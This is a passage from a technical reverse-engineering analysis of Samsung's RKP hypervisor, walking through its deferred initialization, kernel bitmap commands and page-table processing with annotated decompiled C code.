if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
return -1;
}
// Set the kernel text section as read-only from the hypervisor.
if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
return -1;
}
// Ensure the `swapper_pg_dir` is not contained within the kernel text section.
if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
// Set the `swapper_pg_dir` as writable from the hypervisor.
if (s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
rkp_phys_map_lock(ZERO_PG_ADDR);
// Set the `empty_zero_page` as read-only executable in the second stage.
if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0 /* read-write */, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
return -1;
}
rkp_phys_map_unlock(ZERO_PG_ADDR);
// Make the kernel text section executable for the kernel (note the 0 given as argument).
if (rkp_set_kernel_rox(0 /* read-write */)) {
return -1;
}
// Set the log region read-only in the second stage.
if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80 /* read-only */, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
return -1;
}
// Ensure the dynamic heap has been initialized.
if (!uh_state.dynamic_heap_inited) {
return 0;
}
// Set the dynamic heap region as read-only in the second stage.
if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80 /* read-only */,
1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
return -1;
}
return 0;
}
The rkp_set_kernel_rox
function makes the kernel text and rodata sections executable in the second stage, and depending on the access
argument, either writable or read-only. When the function is first called, the argument is 0, but it is called again later with 0x80. It also updates the ro_bitmap
to mark the kernel rodata section pages as read-only (which is different from the actual page tables).
int64_t rkp_set_kernel_rox(int64_t access) {
// ...
// Set the kernel text and rodata sections as executable.
erodata_pa = rkp_get_pa(ERODATA);
if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
return -1;
}
// If the kernel text and rodata sections are read-only in the second stage, return here.
if (access) {
return 0;
}
// Ensure the end of the kernel text and rodata sections are page-aligned.
if (((erodata_pa | ETEXT_PA) & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
return 0;
}
// Ensure the end of the kernel text is before the end of the rodata section.
if (ETEXT_PA > erodata_pa) {
uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
return 0;
}
// Mark all the pages belonging to the kernel rodata as read-only in the `ro_bitmap`.
paddr = ETEXT_PA;
while (sparsemap_set_value_addr(&uh_state.ro_bitmap, addr, 1) >= 0) {
paddr += 0x1000;
if (paddr >= erodata_pa) {
return 0;
}
uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
}
return 0;
}
We mentioned that, after rkp_paging_init
, rkp_start
also calls rkp_l1pgt_process_table
to process the page tables. We will detail the inner workings of this function later, but it is called with the value of the TTBR0_EL1
register and mainly makes its 3 levels of tables read-only.
On the kernel side, the second startup-related command is called in rkp_deferred_init
.
static inline void rkp_deferred_init(void){
uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}
rkp_deferred_init
itself is called by kernel_init
, which is later in the kernel boot process.
static int __ref kernel_init(void *unused)
{
// ...
rkp_deferred_init();
// ...
}
On the hypervisor side, the command handler rkp_cmd_deferred_start
simply calls rkp_deferred_start
. It sets the kernel text section as read-only in the second stage. It also processes the two kernel page tables, swapper_pg_dir
and tramp_pg_dir
, using the rkp_l1pgt_process_table
function.
int64_t rkp_deferred_start() {
uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
// Set the kernel text section as read-only in the second stage (here the argument is 0x80).
if (rkp_set_kernel_rox(0x80 /* read-only */)) {
return -1;
}
// Call a function that will process the `swapper_pg_dir` kernel page tables.
if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1ffffff, 1) < 0) {
uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
return -1;
}
// Call a function that will process the `tramp_pg_dir` kernel page tables.
if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1ffffff, 1) < 0) {
uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
return -1;
}
// Mark RKP as deferred initialized.
rkp_deferred_inited = 1;
uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
memory_fini();
return 0;
}
By digging in the kernel sources, we can find 3 more commands that are called by the kernel during startup.
Two of them are still called in rkp_init
:
static void __init rkp_init(void)
{
// ...
rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
// ...
}
The two commands RKP_GET_RO_BITMAP
and RKP_GET_DBL_BITMAP
take an instance of sparse_bitmap_for_kernel
as an argument.
typedef struct sparse_bitmap_for_kernel {
u64 start_addr;
u64 end_addr;
u64 maxn;
char **map;
} sparse_bitmap_for_kernel_t;
These instances are rkp_s_bitmap_ro
and rkp_s_bitmap_dbl
, respectively.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
They correspond to the hypervisor's ro_bitmap
and dbl_bitmap
sparsemaps, respectively.
The first one is used to check if a page has been set as read-only by the hypervisor, using the rkp_is_pg_protected
function.
static inline u8 rkp_is_pg_protected(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}
The second one is used to check if a page is already mapped and should not be mapped a second time, using the rkp_is_pg_dbl_mapped
function.
static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}
Both functions call rkp_check_bitmap
, which extracts the bit corresponding to the given physical address from the kernel bitmap.
#define SPARSE_UNIT_BIT (30)
#define SPARSE_UNIT_SIZE (1<<SPARSE_UNIT_BIT)
// ...
static inline u8 rkp_check_bitmap(u64 pa, sparse_bitmap_for_kernel_t *kernel_bitmap){
u8 val;
u64 offset, map_loc, bit_offset;
char *map;
if(!kernel_bitmap || !kernel_bitmap->map)
return 0;
offset = pa - kernel_bitmap->start_addr;
map_loc = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) >> 3;
bit_offset = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) % 8;
if(kernel_bitmap->maxn <= (offset >> SPARSE_UNIT_BIT))
return 0;
map = kernel_bitmap->map[(offset >> SPARSE_UNIT_BIT)];
if(!map)
return 0;
val = (u8)((*(u64 *)(&map[map_loc])) >> bit_offset) & ((u64)1);
return val;
}
RKP_GET_RO_BITMAP
and RKP_GET_DBL_BITMAP
are handled similarly by the hypervisor, so we will only take a look at the handler for the first one.
rkp_cmd_get_ro_bitmap
allocates a sparse_bitmap_for_kernel_t
structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel
, which will fill it with the information in ro_bitmap
. Then it puts the VA from the newly allocated structure into X0, and if a pointer was provided in X2, it will also put the VA there (using virt_to_phys_el1
to convert it).
int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
// ...
// This command cannot be called after RKP has been deferred initialized.
if (rkp_deferred_inited) {
return -1;
}
// Allocate the bitmap structure that will be returned to the kernel.
bitmap = dynamic_heap_alloc(0x20, 0);
if (!bitmap) {
uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
return -1;
}
// Reset the newly allocated structure.
memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
// Fill the kernel bitmap with the contents of the hypervisor `ro_bitmap`.
res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
if (res) {
uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
return res;
}
// Put the kernel bitmap VA in x0.
regs->x0 = rkp_get_va(bitmap);
// Put the kernel bitmap VA in the memory referenced by x2.
if (regs->x2) {
*virt_to_phys_el1(regs->x2) = regs->x0;
}
uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
return 0;
}
To see how the kernel bitmap is filled from the hypervisor sparsemap, let's look at sparsemap_bitmap_kernel
. This function converts the PAs of all the sparsemap entries into VAs before copying them into the sparse_bitmap_for_kernel_t
structure.
int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
// ...
// Sanity-check the arguments.
if (!map || !kernel_bitmap) {
return -1;
}
// Copy the start address, end address, and entries unchanged.
kernel_bitmap->start_addr = map->start_addr;
kernel_bitmap->end_addr = map->end_addr;
kernel_bitmap->maxn = map->count;
// Allocate from the dynamic heap an array to hold the entries addresses.
bitmaps = dynamic_heap_alloc(8 * map->count, 0);
if (!bitmaps) {
uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
return -1;
}
// Private sparsemaps are not allowed to be accessed by the kernel.
if (map->private) {
uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
return -1;
}
// Zero out the allocated memory.
memset(bitmaps, 0, 8 * map->count);
// Save the VA of the allocated array.
kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xffffffc000000000;
index = 0;
do {
// Store the VAs of the entries into the array.
bitmap = map->entries[index].bitmap;
if (bitmap) {
bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xffffffc000000000;
}
++index;
} while (index < kernel_bitmap->maxn);
return 0;
}
The third command is RKP_GET_RKP_GET_BUFFER_BITMAP
, and it is called by the kernel in rkp_robuffer_init
.
static void __init rkp_robuffer_init(void)
{
rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}
It is also used to retrieve a sparsemap, this time the page_allocator.map
.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
It is used to check if a page comes from the hypervisor's pages allocator using the is_rkp_ro_page
function.
static inline unsigned int is_rkp_ro_page(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}
The 3 commands used for retrieving a sparsemap are all called from the start_kernel
function.
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_robuffer_init();
// ...
rkp_init();
// ...
}
To summarize a little bit, these bitmaps are used by the kernel to check if some data is located on a page that is protected by RKP. If that is the case, the kernel knows it will need to call one of the RKP commands to modify it.
We left it aside for a moment when we saw the calls to rkp_l1pgt_process_table
in rkp_start
and rkp_deferred_start
, but now the time has come to detail how the kernel page tables are processed by the hypervisor. But first, a quick reminder about the layout of the kernel pages table.
Here is the Linux memory layout on Android (using 4 KB pages + 3 levels):
Start End Size Use
-----------------------------------------------------------------------
0000000000000000 0000007fffffffff 512GB user
ffffff8000000000 ffffffffffffffff 512GB kernel
And here is the corresponding translation table lookup:
+--------+--------+--------+--------+--------+--------+--------+--------+
|63 56|55 48|47 40|39 32|31 24|23 16|15 8|7 0|
+--------+--------+--------+--------+--------+--------+--------+--------+
| | | | | |
| | | | | v
| | | | | [11:0] in-page offset
| | | | +-> [20:12] L3 index (PTE)
| | | +-----------> [29:21] L2 index (PMD)
| | +---------------------> [38:30] L1 index (PUD)
| +-------------------------------> [47:39] L0 index (PGD)
+-------------------------------------------------> [63] TTBR0/1
So keep in mind for this section that we have PGD = PUD = VA[38:30] because we are only using 3 levels of AT.
Here are the formats of the level 0, level 1, and level 2 descriptors (that can be invalid, block or table descriptors):
Here are the formats of the level 3 descriptors (which can be invalid or page descriptors):
Processing of the first level tables (or PGDs) is done by the rkp_l1pgt_process_table
function. A kernel PGD must be either swapper_pg_dir
or tramp_pg_dir
, unless we're prior to deferred initialization. The user PGD idmap_pg_dir
is also never processed by this function.
If the PGD is being introduced, it is marked as L1
in the physmap and made read-only in the second stage. If the PGD is being retired, it is marked as FREE
in the physmap and made writable in the second stage.
Finally, the descriptors of the PGD are processed: table descriptors are passed to the rkp_l2pgt_process_table
function and have their PXN
bit set if this was a user PGD, and block descriptors have their PXN
bit set regardless of the PGD type.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
// If this is a kernel PGD.
if (high_bits == 0x1ffffff) {
// It should be either `swapper_pg_dir` or `tramp_pg_dir`, or RKP should not be deferred initialized.
if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
// If it is not, we trigger a policy violation that results in a panic.
rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
return -1;
}
} else {
// If it is a user PGD and it is `idmap_pg_dir`, return without procesing it.
if (ID_MAP_PGD == pgd) {
return 0;
}
}
rkp_phys_map_lock(pgd);
// If we are introducing this PGD.
if (is_alloc) {
// If it is already marked as a PGD in the physmap, return without processing it.
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (high_bits) {
type = KERNEL | L1;
} else {
type = L1;
}
// And mark the PGD as such in the physmap.
res = rkp_phys_map_set(pgd, type);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
// Make the PGD read-only in the second stage.
res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
rkp_phys_map_unlock(pgd);
return res;
}
}
// If we are retiring this PGD.
else {
// If it is not marked as a PGD in the physmap, return without processing it.
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Mark the PGD as `FREE` in the physmap.
res = rkp_phys_map_set(pgd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
// Make the PGD writable in the second stage.
res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
rkp_phys_map_unlock(pgd);
return res;
}
}
// Now iterate over each descriptor of the PGD.
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
desc_p = pgd + entry;
desc = *desc_p;
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
}
// Table descriptor.
else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// Make the memory non executable at EL1 for user PGDs.
if (!(start_addr >> 39)) {
set_pxn_bit_of_desc(desc_p, 1);
}
}
entry += 8;
offset += 0x40000000;
start_addr = addr;
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
Processing of the second level tables (or PMDs) is done by the rkp_l2pgt_process_table
function. If the first user PMD given to this function was not allocated from the hypervisor page allocator, then user PMDs will no longer be processed.
If the PMD is being introduced, it is marked as L2
in the physmap, and made read-only in the second stage. Kernel PMDs are never allowed to be retired. If the user PMDs is being retired, it is marked as FREE
in the physmap and made writable in the second stage.
Finally, the descriptors of the PMD are processed: all descriptors are passed to the check_single_l2e
function.
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
// If this is a user PMD.
if (!(start_addr >> 39)) {
// The first time this function is called, determine if the PMD was allocated by the hypervisor page allocator. The
// default value of `pmd_allocated_by_rkp` is 0, 1 means "process the PMD", -1 means "don't process it".
if (!pmd_allocated_by_rkp) {
if (page_allocator_is_allocated(pmd) == 1) {
pmd_allocated_by_rkp = 1;
} else {
pmd_allocated_by_rkp = -1;
}
}
// If the PMD was not allocated by RKP, return without processing it.
if (pmd_allocated_by_rkp == -1) {
return 0;
}
}
rkp_phys_map_lock(pmd);
// If we are introducing this PMD.
if (is_alloc) {
// If it is not marked as a PMD in the physmap, return without processing it.
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (start_addr >> 39) {
type = KERNEL | L2;
} else {
type = L2;
}
// And mark the PMD as such in the physmap.
res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xff80 | type);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return res;
}
// Make the PMD read-only in the second stage.
res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
rkp_phys_map_unlock(pmd);
return res;
}
}
// If we are retiring this PMD.
else {
// If it is not marked as a PMD in the physmap, return without processing it.
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Kernel PMDs are not allowed to be retired.
if (start_addr >= 0xffffff8000000000) {
rkp_policy_violation("Never allow free kernel page table %lx", pmd);
}
// Also check that it is not marked `KERNEL` in the physmap.
if (is_phys_map_kernel(pmd)) {
rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
}
// Mark the PMD as `FREE` in the physmap.
res = rkp_phys_map_set(pmd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Make the PMD writable in the second stage.
res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
rkp_phys_map_unlock(pgd);
return 0;
}
}
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pgd);
return res;
}
check_single_l2e
processes each PMD descriptor. If the descriptor is mapping a VA that is executable, the PMD is not allowed to be retired. If it is being introduced, then the hypervisor will protect the next level table. If the VA is not executable, the PXN
bit of the descriptor is set.
If the descriptor is a block descriptor, no further processing is performed. However, if it is a table descriptor, then the rkp_l3pgt_process_table
function is called to process the next level table.
int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
// If the virtual address mapped by this descriptor is executable (it is in the `executable_regions` memlist).
if (executable_regions_contains(start_addr, 2)) {
// The PMD is not allowed to be retired, trigger a policy violation.
if (!is_alloc) {
uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1ff,
(start_addr >> 21) & 0x1ff);
rkp_policy_violation("RKP_d60f7274");
}
// The PMD is being allocated, set the protect flag (to protect the next level table).
protect = 1;
} else {
// The virtual address is not executable, set the PXN bit of the descriptor.
set_pxn_bit_of_desc(desc_p, 2);
// Unset the protect flag (we don't need to protect the next level table).
protect = 0;
}
// Get the descriptor type.
desc = *desc_p;
type = *desc & 0b11;
// Block descriptor, return without processing it.
if (type == 0b01) {
return 0;
}
// Invalid descriptor, return without processing it.
if (type != 0b11) {
if (desc) {
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
}
return 0;
}
// Table descriptor, log if the PT needs to be protected.
if (protect) {
uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1ff,
(start_addr >> 30) & 0x1ff);
}
// If the kernel PMD is being retired, log as well.
if (!is_alloc && start_addr >= 0xffffff8000000000) {
uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1ff,
(start_addr >> 21) & 0x1ff);
uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1ffffff, 0);
}
// Call rkp_l3pgt_process_table to process the PT.
return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}
Processing of the third level tables (or PTs) is done by the rkp_l3pgt_process_table
function. If the PT maps the kernel text, the PTE of the kernel text start is saved into the stext_ptep
global variable. If the PT doesn't need to be protected, the function returns without any processing.
If the PT is being introduced, it is marked as L3
in the physmap, and made read-only in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping non executable VAs have their PXN
bit set.
If the PT is being retired, it is marked as FREE
in the physmap and a violation is triggered. If the violation doesn't panic (though it should after initialization since rkp_panic_on_violation
is set), the PT is made writable in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping executable VAs trigger violations.
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
cs_enter(&l3pgt_lock);
// If `stext_ptep` hasn't been set already, and this PT maps the kernel text (i.e. the first virtual address mapped
// and the kernel text have the same PGD, PUD, PMD indexes), then set `stext_ptep` to the PTE of the kernel text
// start.
if (!stext_ptep && ((TEXT ^ start_addr) & 0x7fffe00000) == 0) {
stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1ff);
uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
}
cs_exit(&l3pgt_lock);
// If we don't need to protect this PT, return without processing it.
if (!protect) {
return 0;
}
rkp_phys_map_lock(pte);
// If we are introducing this PT.
if (is_alloc) {
// If it is not marked as a PT in the physmap, return without processing it.
if (is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (start_addr >> 39) {
type = KERNEL | L3;
} else {
type = L3;
}
// And mark the PT as such in the physmap.
res = rkp_phys_map_set(pte, type);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
// Make the PT read-only in the second stage.
res = rkp_s2_page_change_permission(pte, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
rkp_phys_map_unlock(pte);
return res;
}
// Now iterate over each descriptor of the PT.
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xffffffffffe00fff;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
// Invalid descriptor, trigger a violation.
if ((desc & 0b11) != 0b11) {
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
}
// Page descriptor, if the virtual address mapped by this descriptor is not executable, then set the PXN bit.
if (!executable_regions_contains(addr, 3)) {
set_pxn_bit_of_desc(desc_p, 3);
}
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
(addr >> 21) & 0x1ff);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
// If we are retiring this PT.
else {
// If it is not marked as a PT in the physmap, return without processing it.
if (!is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
// Mark the PT as `FREE` in the physmap.
res = rkp_phys_map_set(pte, FREE);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
// Protected PTs are not allowed to be retired, so trigger a violation. If we did not panic, continue.
rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
// Make the PT writable in the second stage.
res = rkp_s2_page_change_permission(pte, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
rkp_phys_map_unlock(pte);
return res;
}
// Now iterate over each descriptor of the PT.
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xffffffffffe00fff;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
// Invalid descriptor, trigger a violation.
if ((desc & 0b11) != 0b11) {
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
}
// Page descriptor, if the virtual address mapped by this descriptor is executable, trigger a violation.
if (executable_regions_contains(addr, 3)) {
rkp_policy_violation("RKP_b5438cb1");
}
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
(addr >> 21) & 0x1ff);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
rkp_phys_map_unlock(pte);
return 0;
}
If functions processing the kernel page tables find something they consider a policy violation, they call rkp_policy_violation
with a string that describes the violation as an argument. This function logs the message and calls uh_panic
if rkp_panic_on_violation
is set.
int64_t rkp_policy_violation(const char* message, ...) {
// ...
// Log the violation message and its arguments.
res = rkp_log(0x4c, "rkp.c", 108, message, /* variable arguments */);
// Panic if panic on violation is enabled.
if (rkp_panic_on_violation) {
uh_panic();
}
return res;
}
rkp_log
is a wrapper around uh_log
that adds the current time and CPU number to the message. It also calls bigdata_store_rkp_string
to copy the formatted message to the analytics, or bigdata, region.
This section serves as a reference of the overall state after startup (normal and deferred) is finished. We go over each of the internal structures of RKP, as well as the hypervisor-controlled page tables, and detail their content and where it was added or removed.
dynamic_regions
¶uh_init
init_cmd_add_dynamic_region
init_cmd_initialize_dynamic_heap
protected_ranges
¶pa_restrict_init
pa_restrict_init
physmap
added in init_cmd_initialize_dynamic_heap
page_allocator.list
¶init_cmd_initialize_dynamic_heap
init_cmd_initialize_dynamic_heap
executable_regions
¶rkp_start
TEXT
-ETEXT
added in rkp_start
TRAMP_VALIAS
page added in rkp_start
dynamic_load_ins
)dynamic_load_rm
)dynamic_load_regions
¶rkp_start
dynamic_load_add_dynlist
)dynamic_load_rm_dynlist
)physmap
(based on dynamic_regions
)¶init_cmd_initialize_dynamic_heap
TEXT
-ETEXT
set as TEXT
in rkp_paging_init
TTBR0_EL1
) set as L1
in rkp_l1pgt_process_table
TTBR0_EL1
) set as L2
in rkp_l2pgt_process_table
TTBR0_EL1
) set as L3
where VA in executable_regions
in rkp_l3pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L1
in rkp_l1pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L2
in rkp_l2pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L3
where VA in executable_regions
in rkp_l3pgt_process_table
rkp_lxpgt_process_table
)set_range_to_pxn|rox_l3
)rkp_set_pages_ro
, rkp_ro_free_pages
)ro_bitmap
(based on dynamic_regions
)¶init_cmd_initialize_dynamic_heap
ETEXT
-ERODATA
set as 1
in rkp_set_kernel_rox
rkp_s2_page_change_permission
)rkp_s2_range_change_permission
)dbl_bitmap
(based on dynamic_regions
)¶init_cmd_initialize_dynamic_heap
rkp_set_map_bitmap
)robuf
/page_allocator.map
(based on dynamic_regions
)¶init_cmd_initialize_dynamic_heap
page_allocator_alloc_page
)page_allocator_free_page
)memory_init
uh_init_bigdata
init_cmd_initialize_dynamic_heap
TEXT
-ETEXT
mapped RO in rkp_paging_init
swapper_pg_dir
page mapped RW in rkp_paging_init
init_cmd_initialize_dynamic_heap
init_cmd_initialize_dynamic_heap
rkp_paging_init
empty_zero_page
page mapped as RWX in rkp_paging_init
TEXT
-ERODATA
mapped as RWX in rkp_set_kernel_rox
(from rkp_paging_init
)rkp_paging_init
rkp_paging_init
TTBR0_EL1
) mapped as RO in rkp_l1pgt_process_table
PXN
bit set on block descriptorsPXN
bit set on table descriptors where VA < 0x8000000000TTBR0_EL1
) mapped as RO in rkp_l2pgt_process_table
PXN
bit set on descriptors where VA not in executable_regions
in check_single_l2e
TTBR0_EL1
) mapped as RO where VA in executable_regions
in rkp_l3pgt_process_table
TEXT
-ERODATA
mapped as ROX in rkp_set_kernel_rox
(from rkp_deferred_start
)swapper|tramp_pg_dir
) mapped as RO in rkp_l1pgt_process_table
PXN
bit set on block descriptorsPXN
bit set on table descriptors where VA < 0x8000000000swapper|tramp_pg_dir
) mapped as RO in rkp_l2pgt_process_table
PXN
bit set on descriptors where VA not in executable_regions
in check_single_l2e
swapper|tramp_pg_dir
) mapped as RO where VA in executable_regions
in rkp_l3pgt_process_table
PXN
bit set on descriptors where VA not in executable_regions
We have seen in the previous sections how RKP manages to take full control of the kernel page tables and what it does when it processes them. We will now see how this is used to protect critical kernel data, mainly by allocating it on read-only pages and requiring HVC to modify it.
All the global variables that need to be protected by RKP are annotated with either __rkp_ro
or __kdp_ro
in the kernel sources. These macros move the global variables to the .rkp_ro
and kdp_ro
sections respectively.
#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
